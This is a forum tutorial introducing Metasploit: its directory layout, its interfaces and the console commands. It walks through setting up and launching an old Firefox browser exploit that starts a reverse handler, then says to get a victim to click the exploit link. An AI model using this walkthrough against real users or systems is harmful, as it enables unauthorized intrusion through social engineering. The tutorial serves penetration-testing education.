Go4Expert - How to get started with Metasploit

Metasploit is a Hacking Framework consisting of tools , exploits , Knowledge etc etc...Its a Boon to pen-testers , exploit developers and Hackers ...

This Project was started by H.D Moore and is now open source project managed by Rapid7

For Downloading and installing instructions Click here

I will use my Ubuntu 10.10 OS for code samples. So , some commands maybe different on other OS versions and if you have queries and questions please don't hesitate to post in comments below.

The directory structure

Metasplot have a very self-explanatory and a user-friendly directory structure..

The metasploit directory is located at /opt/metasploit3 in Linux

Code:

aneesh@aneesh-laptop:~$ cd /opt/metasploit3/

aneesh@aneesh-laptop:/opt/metasploit3$

Lets see the different directories :-

Code:

aneesh@aneesh-laptop:/opt/metasploit3$ ls



app  bin  env.sh  lib  msf3  run.sh



aneesh@aneesh-laptop:/opt/metasploit3$ cd msf3/



aneesh@aneesh-laptop:/opt/metasploit3/msf3$ ls



armitage       HACKING  msfconsole  msfgui       msfpescan  plugins  tools



data           lib      msfd        msfmachscan  msfrpc     README



documentation  modules  msfelfscan  msfopcode    msfrpcd    scripts



external       msfcli   msfencode   msfpayload   msfupdate  test



aneesh@aneesh-laptop:/opt/metasploit3/msf3$

The Data directory : contains the basic data for exploits like php sources , wordlists etc etc...

Code:

aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd data/



aneesh@aneesh-laptop:/opt/metasploit3/msf3/data$ ls



armitage             isight.bundle            passivex   vncdll.dll



eicar.com            java                     php        vncdll.x64.dll



eicar.txt            lab                      post       wmap



emailer_config.yaml  meterpreter              snmp       wordlists



exploits             msfcrawler               sounds



gui                  msflinker_linux_x86.bin  sql



ipwn                 msfpescan                templates

The lib directory : The name is pretty self-explanatory , its the file that contains all the libraries necessary to work metasploit

The main directory that is of great use to us is the modules directory

Code:

aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd modules



aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$ ls



auxiliary  encoders  exploits  modules.rb.ts.rb  nops  payloads  post



aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$

The exploit dir : contains the exploits for various architectures
The encoders dir : Contains varoius encoders for encoding pages , programs etc etc...
The auxiliary dir : Contains a list of tools used for pen-testing like DOS , sniffers , etc etc..
The payloads, nops dir : Provides the shellcodes used for exploitations...(Code execution)

Getting to know Metasploit

The main part of metasploit is its interface types. The four main types of interfaces are :-

msfweb (The Web Interface)
msfgui (The graphical user interface)
msfconsole (The console interface)
msfcli (The command line interface)

The most powerful and the most used interface is the Console interface so , We'll be looking at that throughout this tutorial...

To open metasploit just type 'msfconsole' in your shell and you should get an output similar to this :-

Code:

aneesh@aneesh-laptop:~$ msfconsole

                                  _



                                 | |      o



 _  _  _    _ _|_  __,   ,    _  | |  __    _|_



/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |



  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/



                           /|



                           \|



       =[ metasploit v3.6.0-dev [core:3.6 api:1.0]



+ -- --=[ 643 exploits - 328 auxiliary



+ -- --=[ 216 payloads - 27 encoders - 8 nops



       =[ svn r11647 updated today (2011.01.26)



msf >

Now that we know how to open metasploit lets see some of its modules...

We use several commands for it :-

The show all command syntax - show all
The search command syntax - search (pattern)

For eg :-

Lets search for firefox exploits and see whats there in stores for us

Code:

msf > search firefox

[*] Searching loaded modules for pattern 'firefox'...



Exploits



========



   Name                                              Disclosure Date  Rank       Description



   ----                                              ---------------  ----       -----------



   multi/browser/firefox_escape_retval               2006-07-14       normal     Firefox 3.5 escape() Return Value Memory Corruption



   multi/browser/firefox_queryinterface              2006-02-02       normal     Firefox location.QueryInterface() Code Execution



   multi/browser/mozilla_compareto                   2005-07-13       normal     Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution



   multi/browser/mozilla_navigatorjava               2006-07-25       normal     Mozilla Suite/Firefox Navigator Object Code Execution



   windows/browser/apple_quicktime_rtsp              2007-01-01       normal     Apple QuickTime 7.1.3 RTSP URI Buffer Overflow



   windows/browser/awingsoft_winds3d_sceneurl        2009-11-14       excellent  AwingSoft Winds3D Player 3.5 SceneURL Download and Execute



   windows/browser/dxstudio_player_exec              2009-06-09       excellent  Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution



   windows/browser/ms07_017_ani_loadimage_chunksize  2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)



msf >

You will notice that there are many of exploits on browser vulnerabilities..and maybe some are useful for us...

This is the power of metasploit!!

lets use the 'use' command to select a exploit

Syntax :-

Code:

use (path)

Output :-

Code:

msf > use exploit/multi/browser/firefox_escape_retval 



msf exploit(firefox_escape_retval) >

Now lets see the options.

Code:

show options

Output :-

Code:

msf exploit(firefox_escape_retval) > show options



Module options (exploit/multi/browser/firefox_escape_retval):



   Name        Current Setting  Required  Description



   ----        ---------------  --------  -----------



   SRVHOST     0.0.0.0          yes       The local host to listen on.



   SRVPORT     8080             yes       The local port to listen on.



   SSL         false            no        Negotiate SSL for incoming connections



   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)



   URIPATH                      no        The URI to use for this exploit (default is random)



Exploit target:



   Id  Name



   --  ----



   0   Firefox 3.5.0 on Windows XP SP0-SP3

Let us now set the options

This can be done by using :-

Code:

set (option name) (value)

Now lets set some options according to our needs

Code:

msf exploit(firefox_escape_retval) > set SRVHOST localhost



SRVHOST => localhost



msf exploit(firefox_escape_retval) > set SRVPORT 80



SRVPORT => 80



msf exploit(firefox_escape_retval) > set URIPATH /exploit



URIPATH => /exploit

Explanations :-

The 'set SRVHOST localhost' means set the host to localhost this is the server on which our exploit is hosted..
The 'set SRVPORT 80' means this is the Post no on which the server will be hosted …
As we know Post 80 is default for web-servers we use this The 'set URIPATH /exploit' means the URLPATH of the exploit...

This means that we have to bring the victim to click on the page of url http://localhost/exploit
So as to make the exploit work!!

Now as the options are set lets run the exploit...

This can be done by :-

Code:

exploit

Output :-

Code:

msf exploit(firefox_escape_retval) > exploit

[*] Exploit running as background job.

[*] Started reverse handler on 10.10.2.35:4444 

[*] Using URL: http://localhost:80/exploit

[*] Server started.

So the output states that we have successfully started the exploit!!

Now the work gets a lot more easier...

We just have to make a user with this Browser vulnerability click this link..

I hope it is enough to get you started working with metasploit...